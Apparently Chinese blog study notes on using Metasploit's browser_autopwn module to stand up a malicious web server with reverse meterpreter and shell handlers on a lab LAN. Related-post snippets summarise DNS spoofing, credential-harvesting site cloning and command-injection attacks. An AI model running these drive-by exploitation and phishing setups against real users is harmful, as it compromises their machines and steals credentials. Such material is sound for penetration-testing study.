使用metasploit制作钓鱼网站——browser autopwn攻击

最新推荐文章于 2024-06-03 16:02:43 发布
最新推荐文章于 2024-06-03 16:02:43 发布
阅读量866 收藏 6
点赞数 3
分类专栏: 精通Metasploit学习笔记 文章标签: kali linux metasploit 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19623861/article/details/116703871
版权

文章目录

前言

使用metasploit对客户端渗透测试

一、browser autopwn攻击

msf6 > use auxiliary/server/browser_autopwn
msf6 auxiliary(server/browser_autopwn) > options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to l
                                       isten on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


msf6 auxiliary(server/browser_autopwn) > set rhosts 192.168.1.115
rhosts => 192.168.1.115
msf6 auxiliary(server/browser_autopwn) > set srvport 80
srvport => 80
msf6 auxiliary(server/browser_autopwn) > set lhost 192.168.1.113
lhost => 192.168.1.113
msf6 auxiliary(server/browser_autopwn) > set uripath /
uripath => /
msf6 auxiliary(server/browser_autopwn) > exploit
[*] Running module against 192.168.1.115
[*] Auxiliary module execution completed

[*] Setup
msf6 auxiliary(server/browser_autopwn) > 
[*] Starting exploit modules on host 192.168.1.113...
.....
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 192.168.1.113:3333 
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 192.168.1.113:6666 
[*] Started reverse TCP handler on 192.168.1.113:7777 

[*] --- Done, found 0 exploit modules

[-] No exploits, check your MATCH and EXCLUDE settings
[*] Cleaning up exploits...

启动模块后,任何一个连接到系统80端口的目标都会遭到渗透攻击

二、对网站的客户端进行渗透

metasploit对网站客户进行渗透测试

我重来不说话
关注
专栏目录
Metasploit 针对WEB的攻击
weiliang369的博客
02-28 228
这个是一个自动化WEB安全检测工具,看官方咋吹的吧: Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. Arachni is smart, it trains itself by learning from the
Kali渗透测试使用browser_autopwn2模块进行渗透攻击
Liu_Bruce的博客
05-15 1228
Kali渗透测试使用browser_autopwn2模块进行渗透攻击 如果觉得一个一个地选择模块很麻烦, 也可以使用browser_autopwn模块。这种攻击的思路是渗透者构造一个攻击用的Web服务器,然后将这Web服务器的地址发给我目标用户,当目标用户使用有漏洞的浏览器打开这个地址的时候,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功,就会在目标主机上建立一个Meterpreter会话。 实 验 环 境 攻击机:Linux kali 5.10.0 IP
browser_autopwn2
aiquan9342的博客
08-15 196
browser_autopwn2是个啥玩意儿? 一个集合了浏览器漏洞的小框架 option msf > use auxiliary/server/browser_autopwn2 msf auxiliary(browser_autopwn2) > show actions msf auxiliary(browser_autopwn2) ...
Metasploit系列----钓鱼测试
bronze_s的博客
04-18 330
测试环境 攻击环境:kali 目标靶机:windows2003(192.168.1.8) 钓鱼测试(使用漏洞ms13_017_teme) 当用户运行对应文件时漏洞被利用 search ms13_017_teme 查询漏洞利用模块 use 路径 进入模块 run 执行漏洞利用代码 会生成一个路径,在目标机器命令行中执行目标机器中将会启动监听程序 使用sessions查看当前会话 使用 sessions -1 2 链接会话 执行一些查看命令发现钓鱼成功,该信息为目标机器的信息 注: 若提示4444端口被
metasploit对网站漏洞进行攻击
不忘初心,护天下安全!
11-23 2155
针对PHP网站常见的攻击方式中的命令攻击。Command Injection,即命令注入攻击,是指这样一种攻击手段,黑客通过把HTML代码输入一个输入机制(例如缺乏有效验证限制的表格域)来改变网页的动态 生成的内容。使用系统命令是一项危险的操作,尤其在你试图使用远程数据来构造要执行的命令时更是如此。如果使用了被污染数据,命令注入漏洞就产生了。 函数原型 string system(strin...
metasploit 浏览器攻击
01-20
metasploit 浏览器攻击metasploit 浏览器攻击metasploit 浏览器攻击
metasploit针对性钓鱼攻击向量入侵成功
天元喜羊羊的博客
05-27 3708
环境:BT5R3,XP SP3,Adobe Reader 8.1.0 漏洞信息:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659 Description Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earli
Kali学习 | 漏洞利用:4.11 使用browser_autopwn 模块渗透攻击浏览器
qq_43233085的博客
01-13 1684
Kali学习 | 漏洞利用:4.11 使用browser_autopwn 模块渗透攻击浏览器Browser Autopwn介绍操作步骤 Browser Autopwn介绍 Browser Autopwn 是由Metasploit提供的一个辅助模块。 当访问一个Web页面时,它允许用户自动地攻击一个入侵主机。 Browser Autopwn攻击之前,会先进行指纹信息操作,这意味着它不会攻击Mozi...
Metasploit学习笔记之——用Metasploit模拟谷歌极光攻击
JochenZou的专栏
12-20 6284
Metasploit模拟谷歌极光攻击重现 本攻击重现是简化的一个攻击过程,省略了前期情报搜集阶段中外围信息搜索、主机探测与端口扫描、服务扫描与查点、网络漏洞扫描等工作,目的是在最短的时间内模拟渗透攻击的核心环节,是对后续的复杂网络渗透攻击和网络安全防护所做的前期工作。 1.      准备工作 1.1   攻击路线图 下图为此次实验的攻击路线图,主要实现了
Metasploit攻击win7实例——利用MS11_003 IE漏洞攻击win7主机
weixin_47731659的博客
01-19 1917
攻击流程 环境配置: 漏洞主机:win7,IP地址:10.1.1.129 攻击主机:Kali linux,IP地址:10.1.1.128 使用工具: Nessus+metasploit 利用Nessus扫描目标主机 启动Nessus服务 /etc/init.d/nessusd start 访问Nessus控制端https://127.0.0.1:8834/ 配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描
kali使用Metasploit进行渗透攻击
lhf13036943631的博客
05-06 842
2、载入easyfilesharing_seh渗透模块,查看需要设置的参数并进行设置,启动模块。(2)查找与EasyFileSharing有关的渗透模块。(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)
安全笔记:渗透|Metasploit的MSF终端——基础使用(未完全修改)
吾本一无所有,何患徒壁之忧.
05-19 1273
目录 基础 使用指南 接口 功能程序 基础功能 载荷配置 攻击方式 msfvenom 附属功能 数据库 nexpose nessus 自建脚本 常用模块介绍 情报搜集——扫描模块 渗透攻击 后渗透攻击(Meterpreter) 免杀技术 相关知识 基础 使用指南 情报搜集:通常使用信息探测等方式获取目标主机的信息,信息探测分为主动信息探测和被动信息探测,...
从零开始学安全(四十五)●browser_autopwn2漏洞利用配合Ettercap工具实施DNS欺骗攻击...
weixin_30631587的博客
04-08 191
系统:kali 2019 工具Ettercap,Metasploit 环境内网地址 首先 cd /etc/ettercap/ 移动在ettercap 文件下 在用vim 打开编辑 etter.dns 进去后 我们将局域网内 所有18段的ip 访问网页都欺骗跳转到本机ip 80端口 在里面添加 接着 编辑文件/var/www/html/index.ht...
简单的钓鱼网站制作
热门推荐
Culprit的博客
01-30 2万+
制作环境: Kali 制作步骤: 1.打开软件,选择第一项社会工程攻击 2.选择2 Website Attack Vectors 3.选择3Credential Harvester Attack Method 4.选择2.网站克隆 5.输入你kali的ip地址 6.输入要克隆的网站的url或者ip 7.接下来便是等待上钩 8当别人输
kali渗透——使用Metasploit对Web应用的攻击
最新发布
2302_80189643的博客
06-03 222
利用“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。执行后会建立一个Meterpreter会话,可以使用sessions命令查看已打开的活动会话。在dvwa应用程序的Command Execution中,输入ip加上&&符号连接上面的命令。使用这个模块use exploit/multi/script/web_delivery。“&&”操作符,命令之间使用“&&”连接,实现逻辑与的功能。使用sessions -i l 命令来切换到控制会话中。方框中的命令就是要在目标系统上运行的命令。
msfconsole模块的browser autopwn 自动漏洞攻击并回连 前提是在同一个网段上所以要用使用I-love-my-neighbors 网络(这个是针对自己创建的ap实施的)
2301_80361487的博客
02-18 1277
所介绍的技术,都是在“被占领主机”(victim)上,通过“重定向”操作,利用客户端漏洞获得在客户端的主机上执行黑客代码的能力。我们可以看到形形色色的方法。可以在客户端上的用户毫不知情的情况下,被黑客实施了“重定向”操作,只是,在看到这些内容之前,让我们先看一下当手工通过浏览器(browser)去利用一个服务器漏洞的时候我们可以看到什么样子。
ms10_002(极光漏洞)渗透步骤——MSF搭建钓鱼网站
渗透测试
06-07 2181
本文简单介绍了如何使用metasploit针对ms10_002(极光漏洞)进行渗透测试,仅供学习 测试环境 描述 ip 主机 kali2020 192.168.1.113 目标主机 win xp sp3 192.168.1.106 ①启动msf,搜索ms10_002,使用msf中的exploit攻击模块,设置参数 msf6 > search ms10_002 Matching Modules ================ # Name .
metasploit的客户端WEB攻击
天元喜羊羊的博客
05-28 3202
环境:BT5R3,XP SP3,IE6 操作如下: root@bt:/pentest/exploits/set# ./set ..######..########.######## .##....##.##..........##... .##.......##........
第7章渗透攻击 使用Metasploit对操作系统发起攻击
qq_69351815的博客
06-10 568
渗透测试是一种有目的性的、针对目标机构计算机系统安全的检测评估方法。渗透测试可以发现系统的漏洞和安全机制方面的隐患,并以此进行渗透攻击来取得目标计算机的控制权。Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值